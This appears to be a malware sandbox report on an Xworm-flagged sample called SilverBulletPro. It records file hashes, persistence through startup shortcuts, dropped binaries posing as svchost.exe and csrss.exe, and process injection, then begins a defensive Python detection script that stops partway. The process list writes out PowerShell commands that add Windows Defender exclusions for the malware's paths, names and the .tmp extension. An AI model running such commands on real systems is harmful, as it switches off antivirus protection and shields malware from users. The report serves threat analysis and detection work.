| SHA256 | e1252527bc066da6838344d49660e4c6ff2d1ddfda036c5ec19b07fdfb90c8c3 |
| SHA512 | a4a5c97856e314eedbad38411f250d139a668c2256d917788697c8a009d5408d559772e0836713853704e6a3755601ae7ee433e07a34bd0e7f130a3e28729c45 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.scale-400.png
| MD5 | 096d0e769212718b8de5237b3427aacc |
| SHA1 | 4b912a0f2192f44824057832d9bb08c1a2c76e72 |
| SHA256 | 9a0b901e97abe02036c782eb6a2471e18160b89fd5141a5a9909f0baab67b1ef |
| SHA512 | 99eb3d67e1a05ffa440e70b7e053b7d32e84326671b0b9d2fcfcea2633b8566155477b2a226521bf860b471c5926f8e1f8e3a52676cacb41b40e2b97cb3c1173 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.scale-200.png
| MD5 | d9d00ecb4bb933cdbb0cd1b5d511dcf5 |
| SHA1 | 4e41b1eda56c4ebe5534eb49e826289ebff99dd9 |
| SHA256 | 85823f7a5a4ebf8274f790a88b981e92ede57bde0ba804f00b03416ee4feda89 |
| SHA512 | 8b53dec59bba8b4033e5c6b2ff77f9ba6b929c412000184928978f13b475cd691a854fee7d55026e48eab8ac84cf34fc7cb38e3766bbf743cf07c4d59afb98f4 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.scale-150.png
| MD5 | ed306d8b1c42995188866a80d6b761de |
| SHA1 | eadc119bec9fad65019909e8229584cd6b7e0a2b |
| SHA256 | 7e3f35d5eb05435be8d104a2eacf5bace8301853104a4ea4768601c607ddf301 |
| SHA512 | 972a42f7677d57fcb8c8cb0720b21a6ffe9303ea58dde276cfe2f26ee68fe4cc8ae6d29f3a21a400253de7c0a212edf29981e9e2bca49750b79dd439461c8335 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveSmallTile.scale-100.png
| MD5 | 1f156044d43913efd88cad6aa6474d73 |
| SHA1 | 1f6bd3e15a4bdb052746cf9840bdc13e7e8eda26 |
| SHA256 | 4e11167708801727891e8dd9257152b7391fc483d46688d61f44b96360f76816 |
| SHA512 | df791d7c1e7a580e589613b5a56ba529005162d3564fffd4c8514e6afaa5eccea9cea9e1ac43bd9d74ee3971b2e94d985b103176db592e3c775d5feec7aac6d1 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-400.png
| MD5 | adbbeb01272c8d8b14977481108400d6 |
| SHA1 | 1cc6868eec36764b249de193f0ce44787ba9dd45 |
| SHA256 | 9250ef25efc2a9765cf1126524256fdfc963c8687edfdc4a2ecde50d748ada85 |
| SHA512 | c15951cf2dc076ed508665cd7dac2251c8966c1550b78549b926e98c01899ad825535001bd65eeb2f8680cd6753cd47e95606ecf453919f5827ed12bca062887 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-125.png
| MD5 | 8347d6f79f819fcf91e0c9d3791d6861 |
| SHA1 | 5591cf408f0adaa3b86a5a30b0112863ec3d6d28 |
| SHA256 | e8b30bfcee8041f1a70e61ca46764416fd1df2e6086ba4c280bfa2220c226750 |
| SHA512 | 9f658bc77131f4ac4f730ed56a44a406e09a3ceec215b7a0b2ed42d019d8b13d89ab117affb547a5107b5a84feb330329dc15e14644f2b52122acb063f2ba550 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-white_scale-100.png
| MD5 | 19876b66df75a2c358c37be528f76991 |
| SHA1 | 181cab3db89f416f343bae9699bf868920240c8b |
| SHA256 | a024fc5dbe0973fd9267229da4ebfd8fc41d73ca27a2055715aafe0efb4f3425 |
| SHA512 | 78610a040bbbb026a165a5a50dfbaf4208ebef7407660eea1a20e95c30d0d42ef1d13f647802a2f0638443ae2253c49945ebe018c3499ddbf00cfdb1db42ced1 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-150.png
| MD5 | 771bc7583fe704745a763cd3f46d75d2 |
| SHA1 | e38f9d7466eefc6d3d2aaa327f1bd42c5a5c7752 |
| SHA256 | 36a6aad9a9947ab3f6ac6af900192f5a55870d798bca70c46770ccf2108fd62d |
| SHA512 | 959ea603abec708895b7f4ef0639c3f2d270cfdd38d77ac9bab8289918cbd4dbac3c36c11bb52c6f01b0adae597b647bb784bba513d77875979270f4962b7884 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-125.png
| MD5 | b83ac69831fd735d5f3811cc214c7c43 |
| SHA1 | 5b549067fdd64dcb425b88fabe1b1ca46a9a8124 |
| SHA256 | cbdcf248f8a0fcd583b475562a7cdcb58f8d01236c7d06e4cdbfe28e08b2a185 |
| SHA512 | 4b2ee6b3987c048ab7cc827879b38fb3c216dab8e794239d189d1ba71122a74fdaa90336e2ea33abd06ba04f37ded967eb98fd742a02463b6eb68ab917155600 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogoImages\OneDriveMedTile.contrast-black_scale-100.png
| MD5 | 72747c27b2f2a08700ece584c576af89 |
| SHA1 | 5301ca4813cd5ff2f8457635bc3c8944c1fb9f33 |
| SHA256 | 6f028542f6faeaaf1f564eab2605bedb20a2ee72cdd9930bde1a3539344d721b |
| SHA512 | 3e7f84d3483a25a52a036bf7fd87aac74ac5af327bb8e4695e39dada60c4d6607d1c04e7769a808be260db2af6e91b789008d276ccc6b7e13c80eb97e2818aba |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\OneDrive.exe
| MD5 | c2938eb5ff932c2540a1514cc82c197c |
| SHA1 | 2d7da1c3bfa4755ba0efec5317260d239cbb51c3 |
| SHA256 | 5d8273bf98397e4c5053f8f154e5f838c7e8a798b125fcad33cab16e2515b665 |
| SHA512 | 5deb54462615e39cf7871418871856094031a383e9ad82d5a5993f1e67b7ade7c2217055b657c0d127189792c3bcf6c1fcfbd3c5606f6134adfafcccfa176441 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\OneDriveStandaloneUpdater.exe
| MD5 | 9cdabfbf75fd35e615c9f85fedafce8a |
| SHA1 | 57b7fc9bf59cf09a9c19ad0ce0a159746554d682 |
| SHA256 | 969fbb03015dd9f33baf45f2750e36b77003a7e18c3954fab890cddc94046673 |
| SHA512 | 348923f497e615a5cd0ed428eb1e30a792dea310585645b721235d48f3f890398ad51d8955c1e483df0a712ba2c0a18ad99b977be64f5ee6768f955b12a4a236 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe
| MD5 | 57bd9bd545af2b0f2ce14a33ca57ece9 |
| SHA1 | 15b4b5afff9abba2de64cbd4f0989f1b2fbc4bf1 |
| SHA256 | a3a4b648e4dcf3a4e5f7d13cc3d21b0353e496da75f83246cc8a15fada463bdf |
| SHA512 | d134f9881312ddbd0d61f39fd62af5443a4947d3de010fef3b0f6ebf17829bd4c2f13f6299d2a7aad35c868bb451ef6991c5093c2809e6be791f05f137324b39 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Telemetry.dll
| MD5 | 50ea1cd5e09e3e2002fadb02d67d8ce6 |
| SHA1 | c4515f089a4615d920971b28833ec739e3c329f3 |
| SHA256 | 414f6f64d463b3eb1e9eb21d9455837c99c7d9097f6bb61bd12c71e8dce62902 |
| SHA512 | 440ededc1389b253f3a31c4f188fda419daf2f58096cf73cad3e72a746bdcde6bde049ce74c1eb521909d700d50fbfddbf802ead190cd54927ea03b5d0ce81b3 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\vcruntime140.dll
| MD5 | cefcd5d1f068c4265c3976a4621543d4 |
| SHA1 | 4d874d6d6fa19e0476a229917c01e7c1dd5ceacd |
| SHA256 | c79241aec5e35cba91563c3b33ed413ce42309f5145f25dc92caf9c82a753817 |
| SHA512 | d934c43f1bd47c5900457642b3cbdcd43643115cd3e78b244f3a28fee5eea373e65b6e1cb764e356839090ce4a7a85d74f2b7631c48741d88cf44c9703114ec9 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\msvcp140.dll
| MD5 | ce8a66d40621f89c5a639691db3b96b4 |
| SHA1 | b5f26f17ddd08e1ba73c57635c20c56aaa46b435 |
| SHA256 | 545bb4a00b29b4b5d25e16e1d0969e99b4011033ce3d1d7e827abef09dd317e7 |
| SHA512 | 85fc18e75e4c7f26a2c83578356b1947e12ec002510a574da86ad62114f1640128e58a6858603189317c77059c71ac0824f10b6117fa1c83af76ee480d36b671 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\UpdateRingSettings.dll
| MD5 | 037df27be847ef8ab259be13e98cdd59 |
| SHA1 | d5541dfa2454a5d05c835ec5303c84628f48e7b2 |
| SHA256 | 9fb3abcafd8e8b1deb13ec0f46c87b759a1cb610b2488052ba70e3363f1935ec |
| SHA512 | 7e1a04368ec469e4059172c5b44fd08d4ea3d01df98bfd6d4cc91ac45f381862ecf89fe9c6bedce985a12158d840cd6cfa06ce9d22466fbf6110140465002205 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LoggingPlatform.dll
| MD5 | 4ffef06099812f4f86d1280d69151a3f |
| SHA1 | e5da93b4e0cf14300701a0efbd7caf80b86621c3 |
| SHA256 | d5a538a0a036c602492f9b2b6f85de59924da9ec3ed7a7bbf6ecd0979bee54d3 |
| SHA512 | d667fd0ae46039914f988eb7e407344114944a040468e4ec5a53d562db2c3241737566308d8420bb4f7c89c6ef446a7881b83eaac7daba3271b81754c5c0f34a |
C:\Users\Admin\OneDrive\desktop.ini
| MD5 | 2b98cc2afc1d0907c7066453643faac3 |
| SHA1 | 864b3477bba5fb913b0e017f7bc087c3c6af95c4 |
| SHA256 | f625a1050e8ba6df4de974c2acc572e1e637a3429bf2ee1449c552999a6c7268 |
| SHA512 | 9e2eecf1715378f44539cc79c718bcfd9181728e9f2330e34d228badd482ce48a8b916275a0d063dfbcdcadcde25be82c43fea44aea0393ecf3385095550c6e2 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\OneDriveTelemetryStable.dll
| MD5 | 6e8ae346e8e0e35c32b6fa7ae1fc48c3 |
| SHA1 | ca0668ddb59e5aa98d9a90eceba90a0ee2fb7869 |
| SHA256 | 146811735589450058048408f05644a93786a293c09ccb8d74420fb87c0a4d56 |
| SHA512 | aa65ef969b1868a54d78a4f697e6edbded31b118f053bbe8a19a599baaf63821dc05f75b2ac87452cb414ab6572b8d9b349093931e64601c47f8ebbb49c431cd |
C:\Users\Admin\AppData\Local\Temp\aria-debug-4716.log
| MD5 | 0cc1472c8b566ad8006897f2295506a6 |
| SHA1 | 8f8c9544dd54b2fcfb0d29f04c0993fc51756be0 |
| SHA256 | 1cdf535870c68e0d6be0085b230e8bf5fc8ed5228036e0d6c221f8bed784943c |
| SHA512 | ea76f3a8d00addb2b0b1551b3e3d7a4d514193fa465d427fdb38f947474c90250795aadc13f329e1615daf6318dab3f72a70ee18a4381b0e66e08b053fbd3b3a |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncTelemetryExtensions.dll
| MD5 | 51b6038293549c2858b4395ca5c0376e |
| SHA1 | 93bf452a6a750b52653812201a909c6bc1f19fa3 |
| SHA256 | a742c9e35d824b592b3d9daf15efb3d4a28b420533ddf35a1669a5b77a00bb75 |
| SHA512 | b8cfdab124ee424b1b099ff73d0a6c6f4fd0bf56c8715f7f26dbe39628a2453cd63d5e346dbf901fcbfb951dfbd726b288466ff32297498e63dea53289388c0c |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\WnsClientApi.dll
| MD5 | 1957cc4169c0b29a354fd31765b2fc1b |
| SHA1 | aad64fce1dff01bb6fb41a5354dd81706e09669c |
| SHA256 | 114ea2a7872a991a00f2ffd907248cafe1f7475cd399982fd383488f6d7f4839 |
| SHA512 | bca394595a4ef61f1e28b92bdfa70d58663ea50733c940ac36486b529775358927d1063810fcca2505a3d0e59c9492296095c2882fe69ebdc963d1f3128156ec |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5QmlModels.dll
| MD5 | 41a54cf6150f71a40517db6f9a8e12d2 |
| SHA1 | 19cb20dc55cc91877b1638ae105e6ccca65c59ae |
| SHA256 | 4129b5228cd324103e2f35a07e718d03dfa814186126d7f4ed5a7e9d92306a56 |
| SHA512 | 3ecd45e2633feb376fc71481d68e93679e105dc76d57c9dfd2cfcfe18e746bc3bd5fc285d88f3d9b419b33882a9747badcd06d4dc220ad9767a3017748e0210b |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Gui.dll
| MD5 | d059f2c0c4e09b319479190485e917da |
| SHA1 | cba292c199c035f5cd036f72481360ed01ee552a |
| SHA256 | bcfe906135d759cca8c2c7e32679c85404a288d99f3d4da13d929e98f6e607d5 |
| SHA512 | 20d11522da194c0e3ce95ddf2fa1a6770824451e99a0dbf5ff56d3a71d72acf8e930066be0593fd793b38e27a3b24ae91fdfbe8910f0bd60b8e3b85a1e8942cd |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Widgets.dll
| MD5 | 284d1847d183ec943d7abe6c1b437bdc |
| SHA1 | de0a4e53ce02f1d64400e808c1352fdb092d0a42 |
| SHA256 | 3705c8a18dd69f23f02a8a29b792e684a0dfcd360b8e7d71c2afe7e448044074 |
| SHA512 | fa3695ec0decf7b167a84ea908920a1671f0dbf289d17ef19282719d25eec37126ef537b96544cbc8873761544a709c37f909fcca3c17f7aca54ac5138c21581 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Network.dll
| MD5 | 09d40e36108eb7bfe05e315170d60758 |
| SHA1 | 897a621d27db3f8a65493b9ea43eb73be38e3ad5 |
| SHA256 | 3d23eadcb60d469e974591e16d6e73f18e33939bbee1d27953e63df00e629c8f |
| SHA512 | 3ad2d4140d8157f477027b9c8b68d49983049ff9c475e091becbcabfbb47e855ea005682f4367cad0f203be832ac925d6125a979e46d01b3ca2c7ebab74cfa77 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5WinExtras.dll
| MD5 | e94c89df4aab6ecc5c4be4d670245c0a |
| SHA1 | 4d6c31556dbdbee561805557c25747f012392b65 |
| SHA256 | 8bc10ab2b66a07632121deb93b3b8045b5029e918babc2ee2908a29decdab333 |
| SHA512 | 3f42f9eadc0cbebc8e99ee63761aadb7851572b3600197514febd638455b34ee9075d4ec36eae82b2786877f06ebfade73735e3c9d3232fcbb66bed55b96595e |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\libcrypto-1_1.dll
| MD5 | 91c172041ab69aa9bb4d50a2557bc05d |
| SHA1 | 28f8a5a1919472cdfe911b8902f171ecc3c514a9 |
| SHA256 | 14c291c907296098c9d7859063333aff0a344471ddc69497bd1f8004641c11b7 |
| SHA512 | e5f73a6a6c1958e6474b7609724880d69dbae16094ad716ec382c61b6e0c4fbe0f569d54bae0748a41a116a4a035039cb5607543103b8e3f18bfb845bedc9f30 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Core.dll
| MD5 | 3f7e824274680aa09589d590285132a5 |
| SHA1 | 9105067dbd726ab9798e9eec61ce49366b586376 |
| SHA256 | ad44dbb30520d85f055595f0bc734b16b9f2fb659f17198310c0557b55a76d70 |
| SHA512 | cc467c92eec097dc40072d044dfb7a50e427c38d789c642e01886ea724033cab9f2035404b4a500d58f1d102381fe995e7b214c823019d51ef243af3b86a8339 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Quick.dll
| MD5 | 042baef2aae45acfd4d6018cbf95728c |
| SHA1 | 055e62d259641815ee3037221b096093d3ae85f1 |
| SHA256 | c0d9b9ecb002635f24dcaf53eb34f46c22bacf02afae768f2d0834656a5d581d |
| SHA512 | e434acd6c227f049fbbbe0ec5652327d0b9b4633e8867f902e098ca20c6a39176d7bad77ca9d9866949e411b7a27d4eb359566bfe949c325b4bcf5cf155cf2e2 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\Qt5Qml.dll
| MD5 | 1e5f98f97212fdba3f96adc40493b082 |
| SHA1 | 23f4fd2d8c07a476fcb765e9d6011ece57b71569 |
| SHA256 | bdadc298fda94a9ad1268128863276c7f898bef3ae79a3e6782cecf22f1294a2 |
| SHA512 | 86c5654f1ca26d5d153b27d942f505382bbb7a84f2acb3475d1577f60dba8bfec0b27860b847c3a6ff6acf8fcb54a71f775411f8245df5cb068175373dfa9c53 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncViews.dll
| MD5 | 8e9ef192850f858f60dd0cc588bbb691 |
| SHA1 | 80d5372e58abfe0d06ea225f48281351411b997c |
| SHA256 | 146740eddcb439b1222d545b4d32a1a905641d02b14e1da61832772ce32e76ba |
| SHA512 | 793ad58741e8b9203c845cbacc1af11fb17b1c610d307e0698c6f3c2e8d41c0d13ceb063c7a61617e5b59403edc5e831ababb091e283fb06262add24d154bf58 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\adal.dll
| MD5 | fe837e65648bf84a3b19c08bbc79351f |
| SHA1 | b1ad96bcb627565dd02d823b1df3316bba3dac42 |
| SHA256 | 55234df27deb004b09c18dc15ca46327e48b26b36dfb43a92741f86300bd8e9e |
| SHA512 | 64ce9573485341439a1d80d1bdc76b44d63c79fb7ec3de6fb084a86183c13c383ec63516407d82fbc86854568c717764efdec26eaf1f4ed05cdb9f974804d263 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\WebView2Loader.dll
| MD5 | 925531f12a2f4a687598e7a4643d2faa |
| SHA1 | 26ca3ee178a50d23a09754adf362e02739bc1c39 |
| SHA256 | 41a13ba97534c7f321f3f29ef1650bd445bd3490153a2bb2d57e0fbc70d339c1 |
| SHA512 | 221934308658f0270e8a6ed89c9b164efb3516b2cc877216adb3fbd1dd5b793a3189afe1f6e2a7ef4b6106e988210eeb325b6aa78685e68964202e049516c984 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\LogUploader.dll
| MD5 | 03f13c5ec1922f3a0ec641ad4df4a261 |
| SHA1 | b23c1c6f23e401dc09bfbf6ce009ce4281216d7e |
| SHA256 | fe49f22bb132fedf1412e99169d307fa715dbdd84fe71c3e3ff12300d30d4987 |
| SHA512 | b47dbd9fad9467f72d4d0d5ca9df508247176f9e11b537c750837e8b3782a2d20f31fad361153d816ddf7f5e8109a614f3c6e4e2307af69cd3e2506cc0515d81 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\SyncEngine.dll
| MD5 | 0e57c5bc0d93729f40e8bea5f3be6349 |
| SHA1 | 7895bfd4d7ddced3c731bdc210fb25f0f7c6e27e |
| SHA256 | 51b13dd5d598367fe202681dce761544ee3f7ec4f36d0c7c3c8a3fca32582f07 |
| SHA512 | 1e64aaa7eaad0b2ea109b459455b745de913308f345f3356eabe427f8010db17338806f024de3f326b89bc6fd805f2c6a184e5bae7b76a8dcb9efac77ed4b95b |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncSessions.dll
| MD5 | ae97076d64cdc42a9249c9de5f2f8d76 |
| SHA1 | 75218c3016f76e6542c61d21fe6b372237c64f4d |
| SHA256 | 1e0c26ceecee602b5b4a25fb9b0433c26bac05bd1eee4a43b9aa75ae46ccf115 |
| SHA512 | 0668f6d5d1d012ec608341f83e67ce857d68b4ea9cfa9b3956d4fc5c61f8a6acd2c2622977c2737b936a735f55fdcce46477034f55e5a71e5ef4d115ee09bfec |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncClient.dll
| MD5 | 2df24cd5c96fb3fadf49e04c159d05f3 |
| SHA1 | 4b46b34ee0741c52b438d5b9f97e6af14804ae6e |
| SHA256 | 3d0250f856970ff36862c99f3329a82be87b0de47923debefe21443c76cddf88 |
| SHA512 | a973bc6fd96221252f50ebb8b49774ccfd2a72e6b53e9a412582b0b37f585608e1b73e68f5d916e66b77247b130b4fc58bf49f5bf7a06e39b6931c5f7dac93ab |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\ucrtbase.dll
| MD5 | 7a333d415adead06a1e1ce5f9b2d5877 |
| SHA1 | 9bd49c3b960b707eb5fc3ed4db1e2041062c59c7 |
| SHA256 | 5ade748445d8da8f22d46ad46f277e1e160f6e946fc51e5ac51b9401ce5daf46 |
| SHA512 | d388cb0d3acc7f1792eadfba519b37161a466a8c1eb95b342464adc71f311165a7f3e938c7f6a251e10f37c9306881ea036742438191226fb9309167786fa59a |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\Personal\logUploaderSettings_temp.ini
| MD5 | 51ee89f2b14248718db3be4f6a212c38 |
| SHA1 | e004b2db278d98e7c70d8d034a907a50a8727d3c |
| SHA256 | 60c17fb05c3562e849e9c4ea7b2bb008749d826cece6749d30028815e28b8164 |
| SHA512 | 563cd2087e79bac17e02886dfb7575c31b08a7e3638407962f20e9b881bfe6db601aa55973b4aaf6bf060ea90e45ff651a33506412fb09abcb67f471e0658aab |
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240419-en
Max time kernel
147s
Max time network
166s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | C:\ProgramData\csrss.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | C:\ProgramData\csrss.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\ProgramData\csrss.exe | N/A |
| N/A | N/A | \??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4452 set thread context of 2908 | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | \??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\csrss.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\ProgramData\csrss.exe
"C:\ProgramData\csrss.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".tmp" -Force
\??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro0E5.tmp
"C:\Users\Admin\AppData\Local\Temp\silverbulletapi.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
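Two patterns in the process list above are worth turning into a check rather than reading by eye: the payloads are dropped under user-writable paths with the names of core Windows processes (svchost.exe in Roaming, csrss.exe in ProgramData), and a run of PowerShell commands adds Defender exclusions for exactly those paths, for the bare process names, and for the whole .tmp extension. A process-name exclusion applies to any process with that name, wherever it lives, so the look-alike binaries benefit from it as much as the real ones. The script below is an added example for this report, not part of the sandbox output: it runs the two checks over process-creation records shaped like Sysmon Event ID 1 or Security event 4688. The sample records are constructed from the image paths and command lines listed above, plus one benign control; the directory lists and the Finding type are assumptions for illustration.

```python
"""Triage helper: flag Defender-exclusion abuse and system-binary masquerading
in process-creation records (Sysmon Event ID 1 / Security 4688 style).

Added example for this report, not part of the sandbox output. The sample
events are constructed from the image paths and command lines listed above,
plus one benign control record."""
import ntpath
import re
from dataclasses import dataclass

# Core Windows process names a dropper borrows so its payload blends in.
SYSTEM_BINARY_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "dllhost.exe"}
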